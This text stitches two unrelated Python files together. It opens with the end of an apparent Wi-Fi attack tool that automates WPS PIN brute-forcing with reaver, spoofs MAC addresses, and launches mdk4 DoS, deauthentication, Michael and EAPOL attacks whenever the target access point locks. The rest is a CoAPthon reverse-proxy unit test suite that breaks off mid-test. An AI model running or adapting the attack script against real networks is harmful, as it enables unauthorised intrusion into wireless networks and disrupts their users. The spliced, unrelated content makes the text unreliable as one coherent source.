                logger.debug('Killing DoS')
                p_dos.kill()
                t_dos.join()
            for should_attack, popen, name in zip((attack_deauth, attack_michael, attack_eapol),
                                                  (p_deauth, p_michael, p_eapol),
                                                  ('deauth', 'Michael', 'EAPOL')):
                if should_attack and popen and popen.poll() is None:
                    logger.debug(f'Killing {name}')
                    popen.kill()
        if is_locked:
            dead_wait_time = 30
            logger.info(f'Network appears dead - waiting {dead_wait_time}s')
            # actually wait before rescanning (the original logged the wait
            # but continued immediately)
            time.sleep(dead_wait_time)
            continue
        reaver_result = handle_reaver(bssid, channel, interface, no_nacks, small, new_mac)
        if reaver_result:
            print(text2art('YES!', font='block', chr_ignore=True))
            logger.success('Title of your sex tape.')
            return True
        else:
            is_locked = True


def change_mac(interface, address=None):
    ifdown_args = ['ifconfig', interface, 'down']
    completed_ifdown = subprocess.run(ifdown_args)
    if completed_ifdown.returncode:
        logger.error(f'Failed to bring {interface} down during MAC change')
        return False
    mac_changer_args = ['macchanger']
    if address:
        mac_changer_args.extend(['-m', address])
    else:
        mac_changer_args.append('-r')  # was 'r': macchanger expects the -r flag for a random MAC
    mac_changer_args.append(interface)
    completed_mac_changer = subprocess.run(mac_changer_args, encoding='utf-8', stdout=subprocess.PIPE)
    macchanger_text = completed_mac_changer.stdout
    logger.debug('macchanger reported: {}', macchanger_text)
    # Guard the regex result - the original called .group(1) on a possible None.
    mac_match = re.search(r'New MAC:\s+([a-z0-9:]{17})', macchanger_text) if macchanger_text else None
    new_mac = mac_match.group(1).upper() if mac_match else None
    if completed_mac_changer.returncode and not new_mac:
        logger.error(f'Failed to change MAC - attempting to bring {interface} back up')
    if not new_mac:
        logger.error(f'Failed to read new MAC - attempting to bring {interface} back up')
    ifup_args = ['ifconfig', interface, 'up']
    completed_ifup = subprocess.run(ifup_args)
    if completed_ifup.returncode:
        logger.error(f'Failed to bring {interface} up during MAC change')
        return False
    return new_mac


def handle_reaver(bssid, channel, interface, no_nacks, small, new_mac):
    logger.info('Starting Reaver...')
    reaver_args = ['reaver', '-i', interface, '-b', bssid, '-vv']
    if new_mac:
        reaver_args.extend(['-m', new_mac])
    if no_nacks:
        reaver_args.append('-N')
    if small:
        reaver_args.append('-S')
    if channel:
        reaver_args.extend(['-c', str(channel)])
    c_reaver = pexpect.spawn(' '.join(reaver_args), encoding='utf-8', ignore_sighup=False)
    c_reaver.logfile = sys.stdout
    try:
        c_reaver.expect('Restore previous session.*', timeout=5)
        c_reaver.sendline('Y')
        c_reaver.expect('Restored previous session', timeout=5)
    except pexpect.TIMEOUT:
        pass
    if c_reaver.expect(['Pin cracked', 'Detected AP rate limiting'], timeout=None):
        # only returns false if idx >= 1
        c_reaver.sendcontrol('c')
        c_reaver.expect('Session saved')
        return False
    logger.success('Reaver finished without complaining. Optimistically quitting.')
    return True


def extract_wash_network(bssid, wash_scanned):
    return next((w for w in wash_scanned if w['bssid'] == bssid), None)


def handle_wash(channel, interface, wash_time):
    p_wash = run_wash(channel, interface)
    time.sleep(wash_time)
    p_wash.kill()
    wash_output = p_wash.stdout.readlines()[2:]  # skip the two header rows
    wash_scanned = list(map(get_wash_output, wash_output))
    return wash_scanned


def process_args():
    parser = ArgumentParser()
    parser.add_argument('-b', '--bssid', type=str, help='BSSID of target network')
    parser.add_argument('-w', '--wait-time', type=int, default=60,
                        help='time (secs) to wait between lock checks when attacking')
    parser.add_argument('-c', '--channel', type=int, help='channel of target BSSID(s)')
    parser.add_argument('-N', '--send-nacks', action='store_true',
                        help='send NACKs - disabled by default to speed up some attacks')
    parser.add_argument('-S', '--small', action='store_true',
                        help='enables small subgroup confinement attack on Diffie-Hellman')
    parser.add_argument('-i', '--interface', type=str, default='wlan0mon',
                        help='the interface to use in attacks (default: wlan0mon)')
    parser.add_argument('-v', '--verbose', action='store_true', help='show (and log) more detailed output')
    parser.add_argument('-s', '--spoof-mac', action='store_true', help='use a spoofed MAC (random if -m not provided)')
    parser.add_argument('-m', '--mac-address', type=str, help='the fake MAC to use with -s')
    parser.add_argument('-1', '--dos', action='store_true', help='run DoS attacks when AP locked')
    parser.add_argument('-2', '--deauth', action='store_true', help='run deauth attacks when AP locked')
    parser.add_argument('-3', '--michael', action='store_true', help='run Michael attacks when AP locked')
    parser.add_argument('-4', '--eapol', action='store_true', help='run EAPOL attacks when AP locked')
    parser.add_argument('-9', '--random-attacks', metavar='MINS', type=int,
                        help='cycle through random attacks at this set interval (mins)')
    return parser.parse_args()


def check_requirements():
    requirements = ['mdk4', 'reaver', 'wash', 'macchanger']
    for r in requirements:
        req_exists = which(r)
        if req_exists:
            logger.debug(f'{r} found')
        else:
            logger.error(f'{r} missing - please install before running Cycle')
            return False
    return True


def configure_logging(verbose, bssid: str):
    logger_format = '<green>{time:HH:mm:ss}</green> | <level>{level: <8}</level> | <level>{message}</level>'
    logger.remove()
    logger_level = 'DEBUG' if verbose else 'INFO'
    logger.add(sys.stderr, format=logger_format, level=logger_level)
    bssid_string = f'_{bssid}' if bssid else ''
    logger.add(f'cycle_logs/cycle_{{time:YYYY-MM-DD_HH-mm-ss}}{bssid_string.replace(":", "-")}.log',
               format='{time} | {level} | {message}', level=logger_level, rotation='100 MB')


def main():
    args = process_args()
    configure_logging(args.verbose, args.bssid)
    if check_requirements():
        any_attacks = args.dos or args.deauth or args.michael or args.eapol
        attack_dos = args.dos if any_attacks else True
        if attack_dos:
            logger.info('DoS attack selected')
        attack_deauth = args.deauth if any_attacks else False
        if attack_deauth:
            logger.info('Deauth attack selected')
        attack_michael = args.michael if any_attacks else False
        if attack_michael:
            logger.info('Michael attack selected')
        attack_eapol = args.eapol if any_attacks else False
        if attack_eapol:
            logger.info('EAPOL attack selected')
        attacks = {'dos': attack_dos, 'deauth': attack_deauth, 'michael': attack_michael, 'eapol': attack_eapol}
        run_cycle(args.bssid, args.wait_time, args.channel, 5, args.interface, not args.send_nacks,
                  args.small, (args.spoof_mac, args.mac_address), attacks)


if __name__ == '__main__':
    main()
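# --- Illustrative aside (not part of the original script) ---
# wash_regex above encodes the column layout of wash's table output (BSSID,
# channel, RSSI, WPS version, locked flag, vendor, ESSID). A quick check of
# the parsing on a made-up sample row -- the MAC and ESSID below are invented
# for illustration:
_sample_wash_line = b'AA:BB:CC:DD:EE:FF    6  -47  2.0  No   RalinkTe  ExampleNet'
_parsed = get_wash_output(_sample_wash_line)
assert _parsed['bssid'] == 'AA:BB:CC:DD:EE:FF'
assert _parsed['locked'] is False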
coverage_test_reverse_proxy.py
# -*- coding: utf-8 -*-
from queue import Queue
import random
import socket
import threading
import unittest

from coapclient import HelperClient
from coapreverseproxy import CoAPReverseProxy
from coapserver import CoAPServer
from coapthon import defines
from coapthon.messages.option import Option
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer

__author__ = 'Giacomo Tanganelli'
__version__ = "2.0"


class Tests(unittest.TestCase):

    def setUp(self):
        self.server_address = ("127.0.0.1", 5683)
        self.current_mid = random.randint(1, 1000)
        self.server_mid = random.randint(1000, 2000)
        self.server = CoAPServer("127.0.0.1", 5684)
        self.server_thread = threading.Thread(target=self.server.listen, args=(1,))
        self.server_thread.start()
        self.proxy = CoAPReverseProxy("127.0.0.1", 5683, "reverse_proxy_mapping.xml")
        self.proxy_thread = threading.Thread(target=self.proxy.listen, args=(1,))
        self.proxy_thread.start()
        self.queue = Queue()

    def tearDown(self):
        self.proxy.close()
        self.proxy_thread.join(timeout=25)
        self.proxy = None
        self.server.close()
        self.server_thread.join(timeout=25)
        self.server = None

    def _test_with_client(self, message_list):  # pragma: no cover
        client = HelperClient(self.server_address)
        for message, expected in message_list:
            if message is not None:
                received_message = client.send_request(message)
            if expected is not None:
                if expected.type is not None:
                    self.assertEqual(received_message.type, expected.type)
                if expected.mid is not None:
                    self.assertEqual(received_message.mid, expected.mid)
                self.assertEqual(received_message.code, expected.code)
                if expected.source is not None:
                    self.assertEqual(received_message.source, self.server_address)
                if expected.token is not None:
                    self.assertEqual(received_message.token, expected.token)
                if expected.payload is not None:
                    self.assertEqual(received_message.payload, expected.payload)
                if expected.options:
                    self.assertEqual(len(received_message.options), len(expected.options))
                    for o in expected.options:
                        assert isinstance(o, Option)
                        option_value = getattr(expected, o.name.lower().replace("-", "_"))
                        option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
                        self.assertEqual(option_value, option_value_rec)
        client.stop()

    def _test_with_client_observe(self, message_list):  # pragma: no cover
        client = HelperClient(self.server_address)
        for message, expected in message_list:
            if message is not None:
                client.send_request(message, self.client_callback)
            if expected is not None:
                received_message = self.queue.get()
                if expected.type is not None:
                    self.assertEqual(received_message.type, expected.type)
                if expected.mid is not None:
                    self.assertEqual(received_message.mid, expected.mid)
                self.assertEqual(received_message.code, expected.code)
                if expected.source is not None:
                    self.assertEqual(received_message.source, self.server_address)
                if expected.token is not None:
                    self.assertEqual(received_message.token, expected.token)
                if expected.payload is not None:
                    self.assertEqual(received_message.payload, expected.payload)
                if expected.options:
                    self.assertEqual(len(received_message.options), len(expected.options))
                    for o in expected.options:
                        assert isinstance(o, Option)
                        option_value = getattr(expected, o.name.lower().replace("-", "_"))
                        option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
                        self.assertEqual(option_value, option_value_rec)
        client.stop()

    def client_callback(self, response):  # pragma: no cover
        print("Callback")
        self.queue.put(response)
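    # --- Illustrative aside (not part of the original test suite) ---
    # _test_plugtest and _test_datagram below bypass HelperClient entirely and
    # speak raw UDP: serialize -> sendto -> recvfrom -> deserialize. A
    # compressed sketch of that round-trip, using only calls already present
    # in this file; `demo_roundtrip` is a hypothetical name:
    @staticmethod
    def demo_roundtrip(message, serializer=None):  # pragma: no cover
        serializer = serializer or Serializer()
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.settimeout(5)  # avoid hanging forever on a lost datagram
            sock.sendto(serializer.serialize(message), message.destination)
            datagram, source = sock.recvfrom(4096)
            return serializer.deserialize(datagram, source)
        finally:
            sock.close()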
    def _test_plugtest(self, message_list):  # pragma: no cover
        serializer = Serializer()
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        for message, expected in message_list:
            if message is not None:
                datagram = serializer.serialize(message)
                sock.sendto(datagram, message.destination)
            if expected is not None:
                datagram, source = sock.recvfrom(4096)
                received_message = serializer.deserialize(datagram, source)
                if expected.type is not None:
                    self.assertEqual(received_message.type, expected.type)
                if expected.mid is not None:
                    self.assertEqual(received_message.mid, expected.mid)
                self.assertEqual(received_message.code, expected.code)
                if expected.source is not None:
                    self.assertEqual(received_message.source, source)
                if expected.token is not None:
                    self.assertEqual(received_message.token, expected.token)
                if expected.payload is not None:
                    self.assertEqual(received_message.payload, expected.payload)
                if expected.options is not None:
                    self.assertEqual(received_message.options, expected.options)
                    for o in expected.options:
                        assert isinstance(o, Option)
                        option_value = getattr(expected, o.name.lower().replace("-", "_"))
                        option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
                        self.assertEqual(option_value, option_value_rec)
        sock.close()

    def _test_datagram(self, message_list):  # pragma: no cover
        serializer = Serializer()
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        for message, expected in message_list:
            if message is not None:
                datagram, destination = message
                sock.sendto(datagram, destination)
            if expected is not None:
                datagram, source = sock.recvfrom(4096)
                received_message = serializer.deserialize(datagram, source)
                if expected.type is not None:
                    self.assertEqual(received_message.type, expected.type)
                if expected.mid is not None:
                    self.assertEqual(received_message.mid, expected.mid)
                self.assertEqual(received_message.code, expected.code)
                if expected.source is not None:
                    self.assertEqual(received_message.source, source)
                if expected.token is not None:
                    self.assertEqual(received_message.token, expected.token)
                if expected.payload is not None:
                    self.assertEqual(received_message.payload, expected.payload)
                if expected.options is not None:
                    self.assertEqual(received_message.options, expected.options)
                    for o in expected.options:
                        assert isinstance(o, Option)
                        option_value = getattr(expected, o.name.lower().replace("-", "_"))
                        option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
                        self.assertEqual(option_value, option_value_rec)
        sock.close()

    def test_get_reverse(self):
        print("TEST_GET_REVERSE")
        path = "/Server1/basic"

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = "Basic Resource"

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CREATED.number
        expected.token = None

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.PUT.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CHANGED.number
        expected.token = None

        exchange3 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.DELETE.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.DELETED.number
        expected.token = None

        exchange4 = (req, expected)
        self.current_mid += 1

        self._test_with_client([exchange1, exchange2, exchange3, exchange4])

    def test_separate(self):
        print("TEST_SEPARATE")
        path = "/Server1/separate"

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["CON"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.max_age = 60

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "POST"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CHANGED.number
        expected.token = None
        expected.options = None

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.PUT.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "PUT"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CHANGED.number
        expected.token = None
        expected.options = None

        exchange3 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.DELETE.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.DELETED.number
        expected.token = None

        exchange4 = (req, expected)
        self.current_mid += 1

        self._test_with_client([exchange1, exchange2, exchange3, exchange4])

    def test_post(self):
        print("TEST_POST")
        path = "/Server1/storage/new_res?id=1"

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "test"
        req.add_if_none_match()

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CREATED.number
        expected.token = None
        expected.payload = None
        expected.location_path = "Server1/storage/new_res"
        expected.location_query = "id=1"

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = "/Server1/storage/new_res"
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.if_match = ["test", "not"]

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = "test"

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.PUT.number
        req.uri_path = "/Server1/storage/new_res"
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.if_match = ["not"]
        req.payload = "not"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.PRECONDITION_FAILED.number
        expected.token = None

        exchange3 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = "/Server1/storage/new_res"
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.if_match = ["not"]
        req.payload = "not"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.PRECONDITION_FAILED.number
        expected.token = None

        exchange4 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.PUT.number
        req.uri_path = "/Server1/storage/new_res"
        req._mid = self.current_mid
        req.destination = self.server_address
        req.add_if_none_match()
        req.payload = "not"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.PRECONDITION_FAILED.number
        expected.token = None

        exchange5 = (req, expected)
        self.current_mid += 1

        self._test_with_client([exchange1, exchange2, exchange3, exchange4, exchange5])

    def test_post_block(self):
        print("TEST_POST_BLOCK")
        path = "/Server1/storage/new_res"

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin fermentum ornare. " \
                      "Cras accumsan tellus quis dui lacinia eleifend. Proin ultrices rutrum orci vitae luctus. " \
                      "Nullam malesuada pretium elit, at aliquam odio vehicula in. Etiam nec maximus elit. " \
                      "Etiam at erat ac ex ornare feugiat. Curabitur sed malesuada orci, id aliquet nunc. Phasellus " \
                      "nec leo luctus, blandit lorem sit amet, interdum metus. Duis efficitur volutpat magna, ac " \
                      "ultricies nibh aliquet sit amet. Etiam tempor egestas augue in hendrerit. Nunc eget augue " \
                      "ultricies, dignissim lacus et, vulputate dolor. Nulla eros odio, fringilla vel massa ut, " \
                      "facilisis cursus quam. Fusce faucibus lobortis congue. Fusce consectetur porta neque, id " \
                      "sollicitudin velit maximus eu. Sed pharetra leo quam, vel finibus turpis cursus ac. " \
                      "Aenean ac nisi massa. Cras commodo arcu nec ante tristique ullamcorper. Quisque eu hendrerit" \
                      " urna. Cras fringilla eros ut nunc maximus, non porta nisl mollis. Aliquam in rutrum massa." \
                      " Praesent tristique turpis dui, at ultri"
        req.block1 = (1, 1, 1024)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.REQUEST_ENTITY_INCOMPLETE.number
        expected.token = None
        expected.payload = None

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin fermentum ornare. " \
                      "Cras accumsan tellus quis dui lacinia eleifend. Proin ultrices rutrum orci vitae luctus. " \
                      "Nullam malesuada pretium elit, at aliquam odio vehicula in. Etiam nec maximus elit. " \
                      "Etiam at erat ac ex ornare feugiat. Curabitur sed malesuada orci, id aliquet nunc. Phasellus " \
                      "nec leo luctus, blandit lorem sit amet, interdum metus. Duis efficitur volutpat magna, ac " \
                      "ultricies nibh aliquet sit amet. Etiam tempor egestas augue in hendrerit. Nunc eget augue " \
                      "ultricies, dignissim lacus et, vulputate dolor. Nulla eros odio, fringilla vel massa ut, " \
                      "facilisis cursus quam. Fusce faucibus lobortis congue. Fusce consectetur porta neque, id " \
                      "sollicitudin velit maximus eu. Sed pharetra leo quam, vel finibus turpis cursus ac. " \
                      "Aenean ac nisi massa. Cras commodo arcu nec ante tristique ullamcorper. Quisque eu hendrerit" \
                      " urna. Cras fringilla eros ut nunc maximus, non porta nisl mollis. Aliquam in rutrum massa." \
                      " Praesent tristique turpis dui, at ultri"
        req.block1 = (0, 1, 1024)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (0, 1, 1024)

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \
                      "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \
                      "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \
                      "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum."
        req.block1 = (1, 1, 64)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (1, 1, 64)

        exchange3 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \
                      "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \
                      "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \
                      "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum."
        req.block1 = (3, 1, 64)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.REQUEST_ENTITY_INCOMPLETE.number
        expected.token = None
        expected.payload = None

        exchange4 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \
                      "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \
                      "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \
                      "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum."
        req.block1 = (2, 0, 64)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CREATED.number
        expected.token = None
        expected.payload = None
        expected.location_path = "Server1/storage/new_res"

        exchange5 = (req, expected)
        self.current_mid += 1

        self._test_plugtest([exchange1, exchange2, exchange3, exchange4, exchange5])

    def test_get_block(self):
        print("TEST_GET_BLOCK")
        path = "/Server1/big"

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (0, 0, 512)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (0, 1, 512)
        expected.size2 = 2041

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (1, 0, 256)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (1, 1, 256)
        expected.size2 = 2041

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (2, 0, 128)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (2, 1, 128)
        expected.size2 = 2041

        exchange3 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (3, 0, 64)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (3, 1, 64)
        expected.size2 = 2041

        exchange4 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (4, 0, 32)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (4, 1, 32)
        expected.size2 = 2041

        exchange5 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (5, 0, 16)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (5, 1, 16)
        expected.size2 = 2041

        exchange6 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (6, 0, 1024)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (6, 0, 1024)
        expected.size2 = 2041

        exchange7 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = None
        req.block2 = (7, 0, 1024)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = None
        expected.block2 = (7, 0, 1024)
        expected.size2 = 2041

        exchange8 = (req, expected)
        self.current_mid += 1

        self._test_plugtest([exchange1, exchange2, exchange3, exchange4, exchange5, exchange6, exchange7,
                             exchange8])

    def test_post_block_big(self):
        print("TEST_POST_BLOCK_BIG")
        path = "/Server1/big"

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "Lorem ipsum dolo"
        req.block1 = (0, 1, 16)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (0, 1, 16)

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "r sit amet, consectetur adipisci"
        req.block1 = (1, 1, 32)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (1, 1, 32)

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "ng elit. Sed ut ultrices ligula. Pellentesque purus augue, cursu"
        req.block1 = (2, 1, 64)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (2, 1, 64)

        exchange3 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "s ultricies est in, vehicula congue metus. Vestibulum vel justo lacinia, porttitor quam vitae, " \
                      "feugiat sapien. Quisque finibus, "
        req.block1 = (3, 1, 128)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (3, 1, 128)

        exchange4 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "nisi vitae rhoncus malesuada, augue mauris dapibus tellus, sit amet venenatis libero" \
                      " libero sed lorem. In pharetra turpis sed eros porta mollis. Quisque dictum dolor nisl," \
                      " imperdiet tincidunt augue malesuada vitae. Donec non felis urna. Suspendisse at hend"
        req.block1 = (4, 1, 256)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (4, 1, 256)

        exchange5 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
